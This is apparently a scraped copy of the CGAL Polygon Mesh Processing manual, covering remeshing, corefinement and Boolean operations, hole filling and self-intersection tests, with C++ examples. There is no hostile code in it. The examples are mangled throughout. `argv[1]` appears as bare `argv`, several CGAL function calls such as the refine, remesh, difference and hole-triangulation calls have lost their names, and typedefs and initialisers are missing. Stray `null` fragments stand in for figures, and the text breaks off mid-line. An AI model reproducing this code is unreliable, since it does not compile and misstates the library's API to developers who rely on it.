Corefinement and Boolean Operations : methods to corefine triangle meshes and to compute boolean operations out of corefined closed triangle meshes.\n• Hole Filling : available hole filling algorithms, which can possibly be combined with refinement and fairing.\n• Predicates : predicates that can be evaluated on the processed polygon mesh, which includes point location and self intersection tests.\n• Orientation : checking or fixing the Orientation of a polygon soup.\n• Combinatorial Repairing : reparation of polygon meshes and polygon soups.\n• Computing Normals : normal computation at vertices and on faces of a polygon mesh.\n• Slicer : functor able to compute the intersections of a polygon mesh with arbitrary planes (slicer).\n• Connected Components : methods to deal with connected components of a polygon mesh (extraction, marks, removal, ...)\n\n# Meshing\n\nA surface patch can be refined by inserting new vertices and flipping edges to get a triangulation. Using a criterion presented in , the density of triangles near the boundary of the patch is approximated by the refinement function. The validity of the mesh is enforced by flipping edges. An edge is flipped only if the opposite edge does not exist in the original mesh and if no degenerate triangles are generated.\n\nA region of the surface mesh (e.g. the refined region), can be faired to obtain a tangentially continuous and smooth surface patch. The region to be faired is defined as a range of vertices that are relocated. The fairing step minimizes a linear bi-Laplacian system with boundary constraints, described in . 
The visual results of aforementioned steps are depicted by Figure 60.5 (c and d).\n\n## API\n\n### Meshing\n\nRefinement and fairing functions can be applied to an arbitrary region on a triangle mesh, using :\n\n• CGAL::Polygon_mesh_processing::refine() : given a set of facets on a mesh, refines the region.\n• CGAL::Polygon_mesh_processing::fair() : given a set of vertices on a mesh, fairs the region.\n\nFairing needs a sparse linear solver and we recommend the use of Eigen 3.2 or later. Note that fairing might fail if fixed vertices, which are used as boundary conditions, do not suffice to solve the constructed linear system.\n\nMany algorithms require as input meshes in which all the faces have the same degree, or even are triangles. Hence, one may want to triangulate all polygon faces of a mesh.\n\nThis package provides the function CGAL::Polygon_mesh_processing::triangulate_faces() that triangulates all faces of the input polygon mesh. An approximated support plane is chosen for each face, orthogonal to the normal vector computed by CGAL::Polygon_mesh_processing::compute_face_normal(). Then, the triangulation of each face is the one obtained by building a CGAL::Constrained_Delaunay_triangulation_2 in this plane. This choice is made because the constrained Delaunay triangulation is the triangulation that, given the edges of the face to be triangulated, maximizes the minimum angle of all the angles of the triangles in the triangulation.\n\n### Remeshing\n\nThe incremental triangle-based isotropic remeshing algorithm introduced by Botsch et al , is implemented in this package. This algorithm incrementally performs simple operations such as edge splits, edge collapses, edge flips, and Laplacian smoothing. All the vertices of the remeshed patch are reprojected to the original surface to keep a good approximation of the input.\n\nA triangulated region of a polygon mesh can be remeshed using the function CGAL::Polygon_mesh_processing::isotropic_remeshing(), as illustrated by Figure 60.1. The algorithm has only two parameters : the target edge length for the remeshed surface patch, and the number of iterations of the abovementioned sequence of operations. The bigger this number, the smoother and closer to target edge length the mesh will be.\n\nAn additional option has been added to protect (i.e. not modify) some given polylines. In some cases, those polylines are too long, and reaching the desired target edge length while protecting them is not possible and leads to an infinite loop of edge splits in the incident faces. To avoid that pitfall, the function CGAL::Polygon_mesh_processing::split_long_edges() should be called on the list of constrained edges before remeshing.", null, "Figure 60.1 Isotropic remeshing. (a) Triangulated input surface mesh. (b) Surface uniformly and entirely remeshed. (c) Selection of a range of faces to be remeshed. 
(d) Surface mesh with the selection uniformly remeshed.\n\n## Meshing Examples\n\n### Refine and Fair a Region on a Triangle Mesh\n\nThe following example calls the functions CGAL::Polygon_mesh_processing::refine() and CGAL::Polygon_mesh_processing::fair() for some selected regions on the input triangle mesh.\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Polyhedron_3.h>\n#include <CGAL/Polygon_mesh_processing/refine.h>\n#include <CGAL/Polygon_mesh_processing/fair.h>\n#include <fstream>\n#include <map>\ntypedef CGAL::Polyhedron_3<Kernel> Polyhedron;\ntypedef Polyhedron::Vertex_handle Vertex_handle;\n// extract vertices which are at most k (inclusive)\n// far from vertex v in the graph of edges\nvoid extract_k_ring(Vertex_handle v,\nint k,\nstd::vector<Vertex_handle>& qv)\n{\nstd::map<Vertex_handle, int> D;\nqv.push_back(v);\nD[v] = 0;\nstd::size_t current_index = 0;\nint dist_v;\nwhile (current_index < qv.size() && (dist_v = D[qv[current_index]]) < k)\n{\nv = qv[current_index++];\nPolyhedron::Halfedge_around_vertex_circulator e(v->vertex_begin()), e_end(e);\ndo {\nVertex_handle new_v = e->opposite()->vertex();\nif (D.insert(std::make_pair(new_v, dist_v + 1)).second) {\nqv.push_back(new_v);\n}\n} while (++e != e_end);\n}\n}\nint main(int argc, char* argv[])\n{\nconst char* filename = (argc > 1) ? argv : \"data/blobby.off\";\nstd::ifstream input(filename);\nPolyhedron poly;\nif ( !input || !(input >> poly) || poly.empty()\nstd::cerr << \"Not a valid input file.\" << std::endl;\nreturn 1;\n}\nstd::vector<Polyhedron::Facet_handle> new_facets;\nstd::vector<Vertex_handle> new_vertices;\nfaces(poly),\nstd::back_inserter(new_facets),\nstd::back_inserter(new_vertices),\nCGAL::Polygon_mesh_processing::parameters::density_control_factor(2.));\nstd::ofstream refined_off(\"refined.off\");\nrefined_off << poly;\nrefined_off.close();\nstd::cout << \"Refinement added \" << new_vertices.size() << \" vertices.\" << std::endl;\nPolyhedron::Vertex_iterator v = poly.vertices_begin();\nstd::vector<Vertex_handle> region;\nextract_k_ring(v, 12/*e.g.*/, region);\nbool success = CGAL::Polygon_mesh_processing::fair(poly, region);\nstd::cout << \"Fairing : \" << (success ? \"succeeded\" : \"failed\") << std::endl;\nstd::ofstream faired_off(\"faired.off\");\nfaired_off << poly;\nfaired_off.close();\nreturn 0;\n}\n\n### Triangulate a Polygon Mesh\n\nTriangulating a polygon mesh can be achieved through the function CGAL::Polygon_mesh_processing::triangulate_faces() as shown in the following example.\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Surface_mesh.h>\n#include <CGAL/Polygon_mesh_processing/triangulate_faces.h>\n#include <boost/foreach.hpp>\n#include <fstream>\ntypedef Kernel::Point_3 Point;\ntypedef CGAL::Surface_mesh<Point> Surface_mesh;\nint main(int argc, char* argv[])\n{\nconst char* filename = (argc > 1) ? argv : \"data/P.off\";\nconst char* outfilename = (argc > 2) ? 
argv : \"P_tri.off\";\nstd::ifstream input(filename);\nSurface_mesh mesh;\nif (!input || !(input >> mesh) || mesh.is_empty())\n{\nstd::cerr << \"Not a valid off file.\" << std::endl;\nreturn 1;\n}\n// Confirm that all faces are triangles.\nBOOST_FOREACH(boost::graph_traits<Surface_mesh>::face_descriptor fit, faces(mesh))\nif (next(next(halfedge(fit, mesh), mesh), mesh)\n!= prev(halfedge(fit, mesh), mesh))\nstd::cerr << \"Error: non-triangular face left in mesh.\" << std::endl;\nstd::ofstream cube_off(outfilename);\ncube_off << mesh;\nreturn 0;\n}\n\n### Isotropic Remeshing of a Region on a Polygon Mesh\n\nThe following example shows a complete example of how the isotropic remeshing function can be used. First, the border of the polygon mesh is collected. Since the boundary edges will be considered as constrained and protected in this example, the function split_long_edges() is called first on these edges.\n\nOnce this is done, remeshing is run on all the surface, with protection of constraints activated, for 3 iterations.\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Surface_mesh.h>\n#include <CGAL/Polygon_mesh_processing/remesh.h>\n#include <CGAL/Polygon_mesh_processing/border.h>\n#include <boost/function_output_iterator.hpp>\n#include <fstream>\n#include <vector>\ntypedef boost::graph_traits<Mesh>::halfedge_descriptor halfedge_descriptor;\ntypedef boost::graph_traits<Mesh>::edge_descriptor edge_descriptor;\nstruct halfedge2edge\n{\nhalfedge2edge(const Mesh& m, std::vector<edge_descriptor>& edges)\n: m_mesh(m), m_edges(edges)\n{}\nvoid operator()(const halfedge_descriptor& h) const\n{\nm_edges.push_back(edge(h, m_mesh));\n}\nconst Mesh& m_mesh;\nstd::vector<edge_descriptor>& m_edges;\n};\nint main(int argc, char* argv[])\n{\nconst char* filename = (argc > 1) ? argv : \"data/pig.off\";\nstd::ifstream input(filename);\nMesh mesh;\nif (!input || !(input >> mesh) || !CGAL::is_triangle_mesh(mesh)) {\nstd::cerr << \"Not a valid input file.\" << std::endl;\nreturn 1;\n}\ndouble target_edge_length = 0.04;\nunsigned int nb_iter = 3;\nstd::cout << \"Split border...\";\nstd::vector<edge_descriptor> border;\nPMP::border_halfedges(faces(mesh),\nmesh,\nboost::make_function_output_iterator(halfedge2edge(mesh, border)));\nPMP::split_long_edges(border, target_edge_length, mesh);\nstd::cout << \"done.\" << std::endl;\nstd::cout << \"Start remeshing of \" << filename\n<< \" (\" << num_faces(mesh) << \" faces)...\" << std::endl;\nfaces(mesh),\ntarget_edge_length,\nmesh,\nPMP::parameters::number_of_iterations(nb_iter)\n.protect_constraints(true)//i.e. protect border, here\n);\nstd::cout << \"Remeshing done.\" << std::endl;\nreturn 0;\n}\n\n# Corefinement and Boolean Operations\n\n## Definitions\n\nCorefinement Given two triangulated surface meshes, the corefinement operation consists in refining both meshes so that their intersection polylines are a subset of edges in both refined meshes.", null, "Figure 60.2 Corefinement of two triangulated surface meshes. (Left) Input meshes; (Right) The two input meshes corefined. The common edges of the two meshes are drawn in green.\n\nVolume bounded by a triangulated surface mesh Given a closed triangulated surface mesh, each connected component splits the 3D space into two subspaces. The vertex sequence of each face of a component is seen either clockwise or counterclockwise from these two subspaces. The subspace that sees the sequence clockwise (resp. counterclockwise) is on the negative (resp. positive) side of the component. 
Given a closed triangulated surface mesh tm with no self-intersections, the connected components of tm divide the 3D space into subspaces. We say that tm bounds a volume if each subspace lies exclusively on the positive (or negative) side of all the incident connected components of tm. The volume bounded by tm is the union of all subspaces that are on negative sides of their incident connected components of tm.", null, "Figure 60.3 Volumes bounded by a triangulated surface mesh: The figure shows meshes representing three nested spheres (three connected components). The left side of the picture shows a clipped triangulated surface mesh, with the two possible orientations of the faces for which a volume is bounded by the mesh. The positive and negative sides of each connected component is displayed in light and dark blue, respectively. The right part of the picture shows clipped tetrahedral meshes of the corresponding bounded volumes.\n\n## Corefinement\n\nThe corefinement of two triangulated surface meshes can be done using the function CGAL::Polygon_mesh_processing::corefine(). It takes as input the two triangulated surface meshes to corefine. If constrained edge maps are provided, edges belonging to the intersection of the input meshes will be marked as constrained. In addition, if an edge that was marked as constrained is split during the corefinement, sub-edges will be marked as constrained as well.\n\n## Boolean Operations", null, "Figure 60.4 Let C and S be the volumes bounded by the triangulated surface meshes of a cube and a sphere, respectively. From left to right, the picture shows the triangulated surface meshes bounding the union of C and S, C minus S, the intersection of C and S and S minus C.\n\nThe corefinement of two triangulated surface meshes can naturally be used for computing Boolean operations on volumes. Considering two triangulated surface meshes, each bounding a volume, the functions CGAL::Polygon_mesh_processing::corefine_and_compute_union(), CGAL::Polygon_mesh_processing::corefine_and_compute_intersection() and CGAL::Polygon_mesh_processing::corefine_and_compute_difference() respectively compute the union, the intersection and the difference of the two volumes. Note that there is no restriction on the topology of the input volumes.\n\nHowever, there are some requirements on the input to guarantee that the operation is possible. First, the input meshes must not self-intersect. Second, the operation is possible only if the output can be bounded by a manifold triangulated surface mesh. In particular this means that the output volume has no part with zero thickness. Mathematically speaking, the intersection with an infinitesimally small ball centered in the output volume is a topological ball. At the surface level this means that no non-manifold vertex or edge is allowed in the output. For example, it is not possible to compute the union of two cubes that are disjoint but sharing an edge. In case you have to deal with such scenarios, you should consider using the package 3D Boolean Operations on Nef Polyhedra.\n\nIt is possible to update the input so that it contains the result (in-place operation). In that case the whole mesh will not be copied and only the region around the intersection polyline will be modified. 
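To make the in-place usage concrete, here is a minimal sketch; it is not one of the shipped examples, and the kernel/mesh typedefs, the input files and the output file name are assumptions chosen to match the other listings in this section. The intersection of the two volumes is written back into the first input mesh.

#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>
#include <CGAL/Surface_mesh.h>
#include <CGAL/Polygon_mesh_processing/corefinement.h>
#include <fstream>
#include <iostream>
typedef CGAL::Exact_predicates_inexact_constructions_kernel K;
typedef CGAL::Surface_mesh<K::Point_3> Mesh;
namespace PMP = CGAL::Polygon_mesh_processing;
int main()
{
  Mesh mesh1, mesh2;
  std::ifstream in1("data/blobby.off"), in2("data/eight.off");
  if (!(in1 >> mesh1) || !(in2 >> mesh2))
  {
    std::cerr << "Not a valid off file." << std::endl;
    return 1;
  }
  // Passing mesh1 again as the output mesh makes the operation in-place:
  // only the region around the intersection polylines is rebuilt.
  bool valid = PMP::corefine_and_compute_intersection(mesh1, mesh2, mesh1);
  if (!valid)
  {
    std::cout << "Intersection could not be computed\n";
    return 1;
  }
  std::ofstream output("intersection_inplace.off");
  output << mesh1;
  return 0;
}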
In case the Boolean operation is not possible, the input mesh will nevertheless be corefined.\n\n## Kernel and Validity of the Output\n\nThe corefinement operation (which is also internally used in the three Boolean operations) will correctly change the topology of the input surface mesh if the point type used in the point property maps of the input meshes is from a CGAL Kernel with exact predicates. If that kernel does not have exact constructions, the embedding of the output surface mesh might have self-intersections. In case of consecutive operations, it is thus recommended to use a point property map with points from a kernel with exact predicates and exact constructions (such as CGAL::Exact_predicates_exact_constructions_kernel).\n\nIn practice, this means that with exact predicates and inexact constructions, edges will be split at each intersection with a triangle but the position of the intersection point might create self-intersections due to the limited precision of floating point numbers.\n\n## Examples\n\n### Computing the Union of Two Volumes\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Surface_mesh.h>\n#include <CGAL/Polygon_mesh_processing/corefinement.h>\n#include <fstream>\nint main(int argc, char* argv[])\n{\nconst char* filename1 = (argc > 1) ? argv : \"data/blobby.off\";\nconst char* filename2 = (argc > 2) ? argv : \"data/eight.off\";\nstd::ifstream input(filename1);\nMesh mesh1, mesh2;\nif (!input || !(input >> mesh1))\n{\nstd::cerr << \"First mesh is not a valid off file.\" << std::endl;\nreturn 1;\n}\ninput.close();\ninput.open(filename2);\nif (!input || !(input >> mesh2))\n{\nstd::cerr << \"Second mesh is not a valid off file.\" << std::endl;\nreturn 1;\n}\nMesh out;\nbool valid_union = PMP::corefine_and_compute_union(mesh1,mesh2, out);\nif (valid_union)\n{\nstd::cout << \"Union was successfully computed\\n\";\nstd::ofstream output(\"union.off\");\noutput << out;\nreturn 0;\n}\nstd::cout << \"Union could not be computed\\n\";\nreturn 1;\n}\n\n### Boolean Operation and Local Remeshing\n\nThis example is similar to the previous one, but here we substract a volume and update the first input triangulated surface mesh (in-place operation). The edges that are on the intersection of the input meshes are marked and the region around them is remeshed isotropically while preserving the intersection polyline.\nFile Polygon_mesh_processing/corefinement_difference_remeshed.cpp\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Surface_mesh.h>\n#include <CGAL/Polygon_mesh_processing/corefinement.h>\n#include <CGAL/Polygon_mesh_processing/remesh.h>\n#include <CGAL/boost/graph/selection.h>\n#include <fstream>\ntypedef boost::graph_traits<Mesh>::edge_descriptor edge_descriptor;\ntypedef boost::graph_traits<Mesh>::face_descriptor face_descriptor;\ntypedef boost::graph_traits<Mesh>::halfedge_descriptor halfedge_descriptor;\nnamespace params = PMP::parameters;\nstruct Vector_pmap_wrapper{\nstd::vector<bool>& vect;\nVector_pmap_wrapper(std::vector<bool>& v) : vect(v) {}\nfriend bool get(const Vector_pmap_wrapper& m, face_descriptor f)\n{\nreturn m.vect[f];\n}\nfriend void put(const Vector_pmap_wrapper& m, face_descriptor f, bool b)\n{\nm.vect[f]=b;\n}\n};\nint main(int argc, char* argv[])\n{\nconst char* filename1 = (argc > 1) ? argv : \"data/blobby.off\";\nconst char* filename2 = (argc > 2) ? 
argv : \"data/eight.off\";\nstd::ifstream input(filename1);\nMesh mesh1, mesh2;\nif (!input || !(input >> mesh1))\n{\nstd::cerr << \"First mesh is not a valid off file.\" << std::endl;\nreturn 1;\n}\ninput.close();\ninput.open(filename2);\nif (!input || !(input >> mesh2))\n{\nstd::cerr << \"Second mesh is not a valid off file.\" << std::endl;\nreturn 1;\n}\n//create a property on edges to indicate whether they are constrained\nMesh::Property_map<edge_descriptor,bool> is_constrained_map =\n// update mesh1 to contain the mesh bounding the difference\n// of the two input volumes.\nbool valid_difference =\nmesh2,\nmesh1,\nparams::all_default(), // default parameters for mesh1\nparams::all_default(), // default parameters for mesh2\nparams::edge_is_constrained_map(is_constrained_map));\nif (valid_difference)\n{\nstd::cout << \"Difference was successfully computed\\n\";\nstd::ofstream output(\"difference.off\");\noutput << mesh1;\n}\nelse{\nstd::cout << \"Difference could not be computed\\n\";\nreturn 1;\n}\n// collect faces incident to a constrained edge\nstd::vector<face_descriptor> selected_faces;\nstd::vector<bool> is_selected(num_faces(mesh1), false);\nBOOST_FOREACH(edge_descriptor e, edges(mesh1))\nif (is_constrained_map[e])\n{\n// insert all faces incident to the target vertex\nBOOST_FOREACH(halfedge_descriptor h,\nhalfedges_around_target(halfedge(e,mesh1),mesh1))\n{\nif (!is_border(h, mesh1) )\n{\nface_descriptor f=face(h, mesh1);\nif ( !is_selected[f] )\n{\nselected_faces.push_back(f);\nis_selected[f]=true;\n}\n}\n}\n}\n// increase the face selection\nCGAL::expand_face_selection(selected_faces, mesh1, 2,\nVector_pmap_wrapper(is_selected), std::back_inserter(selected_faces));\nstd::cout << selected_faces.size()\n<< \" faces were selected for the remeshing step\\n\";\n// remesh the region around the intersection polylines\nselected_faces,\n0.02,\nmesh1,\nparams::edge_is_constrained_map(is_constrained_map) );\nstd::ofstream output(\"difference_remeshed.off\");\noutput << mesh1;\nreturn 0;\n}\n\n### Robustness of Consecutive Operations\n\nThis example computes the intersection of two volumes and then does the union of the result with one of the input volumes. This operation is in general not possible when using inexact constructions. Instead of using a mesh with a point from a kernel with exact constructions, the exact points are a property of the mesh vertices that we can reuse in a later operations. 
With that property, we can manipulate a mesh with points having floating point coordinates but benefit from the robustness provided by the exact constructions.\nFile Polygon_mesh_processing/corefinement_consecutive_bool_op.cpp\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Exact_predicates_exact_constructions_kernel.h>\n#include <CGAL/Surface_mesh.h>\n#include <CGAL/Polygon_mesh_processing/corefinement.h>\n#include <fstream>\ntypedef boost::graph_traits<Mesh>::vertex_descriptor vertex_descriptor;\ntypedef Mesh::Property_map<vertex_descriptor,EK::Point_3> Exact_point_map;\ntypedef Mesh::Property_map<vertex_descriptor,bool> Exact_point_computed;\nnamespace params = PMP::parameters;\nstruct Coref_point_map\n{\n// typedef for the property map\ntypedef boost::property_traits<Exact_point_map>::value_type value_type;\ntypedef boost::property_traits<Exact_point_map>::reference reference;\ntypedef boost::property_traits<Exact_point_map>::category category;\ntypedef boost::property_traits<Exact_point_map>::key_type key_type;\n// exterior references\nExact_point_computed* exact_point_computed_ptr;\nExact_point_map* exact_point_ptr;\nMesh* mesh_ptr;\nExact_point_computed& exact_point_computed() const\n{\nCGAL_assertion(exact_point_computed_ptr!=NULL);\nreturn *exact_point_computed_ptr;\n}\nExact_point_map& exact_point() const\n{\nCGAL_assertion(exact_point_ptr!=NULL);\nreturn *exact_point_ptr;\n}\nMesh& mesh() const\n{\nCGAL_assertion(mesh_ptr!=NULL);\nreturn *mesh_ptr;\n}\n// Converters\nCoref_point_map()\n: exact_point_computed_ptr(NULL)\n, exact_point_ptr(NULL)\n, mesh_ptr(NULL)\n{}\nCoref_point_map(Exact_point_map& ep,\nExact_point_computed& epc,\nMesh& m)\n: exact_point_computed_ptr(&epc)\n, exact_point_ptr(&ep)\n, mesh_ptr(&m)\n{}\nfriend\nreference get(const Coref_point_map& map, key_type k)\n{\n// create exact point if it does not exist\nif (!map.exact_point_computed()[k]){\nmap.exact_point()[k]=map.to_exact(map.mesh().point(k));\nmap.exact_point_computed()[k]=true;\n}\nreturn map.exact_point()[k];\n}\nfriend\nvoid put(const Coref_point_map& map, key_type k, const EK::Point_3& p)\n{\nmap.exact_point_computed()[k]=true;\nmap.exact_point()[k]=p;\n// create the input point from the exact one\nmap.mesh().point(k)=map.to_input(p);\n}\n};\nint main(int argc, char* argv[])\n{\nconst char* filename1 = (argc > 1) ? argv : \"data/blobby.off\";\nconst char* filename2 = (argc > 2) ? 
argv : \"data/eight.off\";\nstd::ifstream input(filename1);\nMesh mesh1, mesh2;\nif (!input || !(input >> mesh1))\n{\nstd::cerr << \"First mesh is not a valid off file.\" << std::endl;\nreturn 1;\n}\ninput.close();\ninput.open(filename2);\nif (!input || !(input >> mesh2))\n{\nstd::cerr << \"Second mesh is not a valid off file.\" << std::endl;\nreturn 1;\n}\nExact_point_map mesh1_exact_points =\nExact_point_computed mesh1_exact_points_computed =\nExact_point_map mesh2_exact_points =\nExact_point_computed mesh2_exact_points_computed =\nCoref_point_map mesh1_pm(mesh1_exact_points, mesh1_exact_points_computed, mesh1);\nCoref_point_map mesh2_pm(mesh2_exact_points, mesh2_exact_points_computed, mesh2);\nmesh2,\nmesh1,\nparams::vertex_point_map(mesh1_pm),\nparams::vertex_point_map(mesh2_pm),\nparams::vertex_point_map(mesh1_pm) ) )\n{\nmesh2,\nmesh2,\nparams::vertex_point_map(mesh1_pm),\nparams::vertex_point_map(mesh2_pm),\nparams::vertex_point_map(mesh2_pm) ) )\n{\nstd::cout << \"Intersection and union were successfully computed\\n\";\nstd::ofstream output(\"inter_union.off\");\noutput << mesh2;\nreturn 0;\n}\nstd::cout << \"Union could not be computed\\n\";\nreturn 1;\n}\nstd::cout << \"Intersection could not be computed\\n\";\nreturn 1;\n}\n\n# Hole Filling\n\nThis package provides an algorithm for filling one closed hole that is either in a triangulated surface mesh or defined by a sequence of points that describe a polyline. The main steps of the algorithm are described in and can be summarized as follows.\n\nFirst, the largest patch triangulating the boundary of the hole is generated without introducing any new vertex. The patch is selected so as to minimize a quality function evaluated for all possible triangular patches. The quality function first minimizes the worst dihedral angle between patch triangles, then the total surface area of the patch as a tiebreaker. Following the suggestions in , the performance of the algorithm is significantly improved by narrowing the search space to faces of a 3D Delaunay triangulation of the hole boundary vertices, from all possible patches, while searching for the best patch with respect to the aforementioned quality criteria.\n\nFor some complicated input hole boundary, the generated patch may have self-intersections. After hole filling, the generated patch can be refined and faired using the meshing functions CGAL::Polygon_mesh_processing::refine() and CGAL::Polygon_mesh_processing::fair() described in Section Meshing.", null, "Figure 60.5 Results of the main steps of the algorithm. 
From left to right: (a) the hole, (b) the hole after its triangulation, (c) after triangulation and refinement, (d) after triangulation, refinement and fairing.\n\n## API\n\nThis package provides four functions for hole filling:\n\n• triangulate_hole_polyline() : given a sequence of points defining the hole, triangulates the hole.\n• triangulate_hole() : given a border halfedge on the boundary of the hole on a mesh, triangulates the hole.\n• triangulate_and_refine_hole() : in addition to triangulate_hole() the generated patch is refined.\n• triangulate_refine_and_fair_hole() : in addition to triangulate_and_refine_hole() the generated patch is also faired.\n\n## Examples\n\n### Triangulate a Polyline\n\nThe following example triangulates a hole described by an input polyline.\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Polygon_mesh_processing/triangulate_hole.h>\n#include <CGAL/utility.h>\n#include <vector>\n#include <iterator>\ntypedef Kernel::Point_3 Point;\nint main()\n{\nstd::vector<Point> polyline;\npolyline.push_back(Point( 1.,0.,0.));\npolyline.push_back(Point( 0.,1.,0.));\npolyline.push_back(Point(-1.,0.,0.));\npolyline.push_back(Point( 1.,1.,0.));\n// repeating first point (i.e. polyline.push_back(Point(1.,0.,0.)) ) is optional\n// any type, having Type(int, int, int) constructor available, can be used to hold output triangles\ntypedef CGAL::Triple<int, int, int> Triangle_int;\nstd::vector<Triangle_int> patch;\npatch.reserve(polyline.size() -2); // there will be exactly n-2 triangles in the patch\npolyline,\nstd::back_inserter(patch));\nfor(std::size_t i = 0; i < patch.size(); ++i)\n{\nstd::cout << \"Triangle \" << i << \": \"\n<< patch[i].first << \" \" << patch[i].second << \" \" << patch[i].third\n<< std::endl;\n}\n// note that no degenerate triangles are generated in the patch\nstd::vector<Point> polyline_collinear;\npolyline_collinear.push_back(Point(1.,0.,0.));\npolyline_collinear.push_back(Point(2.,0.,0.));\npolyline_collinear.push_back(Point(3.,0.,0.));\npolyline_collinear.push_back(Point(4.,0.,0.));\nstd::vector<Triangle_int> patch_will_be_empty;\npolyline_collinear,\nback_inserter(patch_will_be_empty));\nCGAL_assertion(patch_will_be_empty.empty());\nreturn 0;\n}\n\n### Hole Filling From the Border of the Hole\n\nIf the input polygon mesh has a hole or more than one hole, it is possible to iteratively fill them by detecting border edges (i.e. with only one incident non-null face) after each hole filling step.\n\nHoles are filled one after the other, and the process stops when there is no border edge left.\n\nThis process is illustrated by the example below, where holes are iteratively filled, refined and faired to get a faired mesh with no hole.\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Polyhedron_3.h>\n#include <CGAL/Polygon_mesh_processing/triangulate_hole.h>\n#include <iostream>\n#include <fstream>\n#include <vector>\n#include <boost/foreach.hpp>\ntypedef CGAL::Polyhedron_3<Kernel> Polyhedron;\ntypedef Polyhedron::Halfedge_handle Halfedge_handle;\ntypedef Polyhedron::Facet_handle Facet_handle;\ntypedef Polyhedron::Vertex_handle Vertex_handle;\nint main(int argc, char* argv[])\n{\nconst char* filename = (argc > 1) ? 
argv : \"data/mech-holes-shark.off\";\nstd::ifstream input(filename);\nPolyhedron poly;\nif ( !input || !(input >> poly) || poly.empty() ) {\nstd::cerr << \"Not a valid off file.\" << std::endl;\nreturn 1;\n}\n// Incrementally fill the holes\nunsigned int nb_holes = 0;\nBOOST_FOREACH(Halfedge_handle h, halfedges(poly))\n{\nif(h->is_border())\n{\nstd::vector<Facet_handle> patch_facets;\nstd::vector<Vertex_handle> patch_vertices;\nbool success = CGAL::cpp11::get<0>(\npoly,\nh,\nstd::back_inserter(patch_facets),\nstd::back_inserter(patch_vertices),\nCGAL::Polygon_mesh_processing::parameters::vertex_point_map(get(CGAL::vertex_point, poly)).\ngeom_traits(Kernel())) );\nstd::cout << \" Number of facets in constructed patch: \" << patch_facets.size() << std::endl;\nstd::cout << \" Number of vertices in constructed patch: \" << patch_vertices.size() << std::endl;\nstd::cout << \" Fairing : \" << (success ? \"succeeded\" : \"failed\") << std::endl;\n++nb_holes;\n}\n}\nstd::cout << std::endl;\nstd::cout << nb_holes << \" holes have been filled\" << std::endl;\nstd::ofstream out(\"filled.off\");\nout.precision(17);\nout << poly << std::endl;\nreturn 0;\n}", null, "Figure 60.6 Holes in the fork model are filled with triangle patches.\n\n## Performance\n\nThe hole filling algorithm has a complexity which depends on the number of vertices. While has a running time of $$O(n^3)$$ , in most cases has running time of $$O(n \\log n)$$. We were running triangulate_refine_and_fair_hole() for the below meshes (and two more meshes with smaller holes). The machine used is a PC running Windows 10 with an Intel Core i7 CPU clocked at 2.70 GHz. The program has been compiled with Visual C++ 2013 compiler with the O2 option which maximizes speed.", null, "Figure 60.7 The elephant on the left/right has a hole with 963/7657 vertices.\n\nThis takes time\n\n# vertices without Delaunay (sec.) with Delaunay (sec.)\n565 8.5 0.03\n774 21 0.035\n967 43 0.06\n7657 na 0.4\n\n# Predicates\n\nThis packages provides several predicates to be evaluated with respect to a triangle mesh.\n\n## Self Intersections\n\nSelf intersections can be detected from a triangle mesh, by calling the predicate CGAL::Polygon_mesh_processing::does_self_intersect(). Additionally, the function CGAL::Polygon_mesh_processing::self_intersections() reports all pairs of intersecting triangles.", null, "Figure 60.8 Detecting self-intersections on a triangle mesh. The intersecting triangles are displayed in dark grey on the right image.\n\n### Self Intersections Example\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Surface_mesh.h>\n#include <CGAL/Polygon_mesh_processing/self_intersections.h>\n#include <fstream>\ntypedef boost::graph_traits<Mesh>::face_descriptor face_descriptor;\nint main(int argc, char* argv[])\n{\nconst char* filename = (argc > 1) ? argv : \"data/pig.off\";\nstd::ifstream input(filename);\nMesh mesh;\nif (!input || !(input >> mesh) || !CGAL::is_triangle_mesh(mesh))\n{\nstd::cerr << \"Not a valid input file.\" << std::endl;\nreturn 1;\n}\nbool intersecting = PMP::does_self_intersect(mesh,\nPMP::parameters::vertex_point_map(get(CGAL::vertex_point, mesh)));\nstd::cout\n<< (intersecting ? 
\"There are self-intersections.\" : \"There is no self-intersection.\")\n<< std::endl;\nstd::vector<std::pair<face_descriptor, face_descriptor> > intersected_tris;\nPMP::self_intersections(mesh, std::back_inserter(intersected_tris));\nstd::cout << intersected_tris.size() << \" pairs of triangles intersect.\" << std::endl;\nreturn 0;\n}\n\n## Side of Triangle Mesh\n\nThe class CGAL::Side_of_triangle_mesh provides a functor that tests whether a query point is inside, outside, or on the boundary of the domain bounded by a given closed triangle mesh.\n\nA point is said to be on the bounded side of the domain bounded by the input triangle mesh if an odd number of surfaces is crossed when walking from the point to infinity. The input triangle mesh is expected to contain no self-intersections and to be free from self-inclusions.\n\nThe algorithm can handle the case of a triangle mesh with several connected components, and returns correct results. In case of self-inclusions, the ray intersections parity test is performed, and the execution will not fail. However, the user should be aware that the predicate alternately considers sub-volumes to be on the bounded and unbounded sides of the input triangle mesh.\n\n### Inside Test Example\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Polyhedron_3.h>\n#include <CGAL/point_generators_3.h>\n#include <CGAL/Side_of_triangle_mesh.h>\n#include <vector>\n#include <fstream>\n#include <limits>\n#include <boost/foreach.hpp>\ntypedef K::Point_3 Point;\ntypedef CGAL::Polyhedron_3<K> Polyhedron;\ndouble max_coordinate(const Polyhedron& poly)\n{\ndouble max_coord = -std::numeric_limits<double>::infinity();\nBOOST_FOREACH(Polyhedron::Vertex_handle v, vertices(poly))\n{\nPoint p = v->point();\nmax_coord = (std::max)(max_coord, p.x());\nmax_coord = (std::max)(max_coord, p.y());\nmax_coord = (std::max)(max_coord, p.z());\n}\nreturn max_coord;\n}\nint main(int argc, char* argv[])\n{\nconst char* filename = (argc > 1) ? argv : 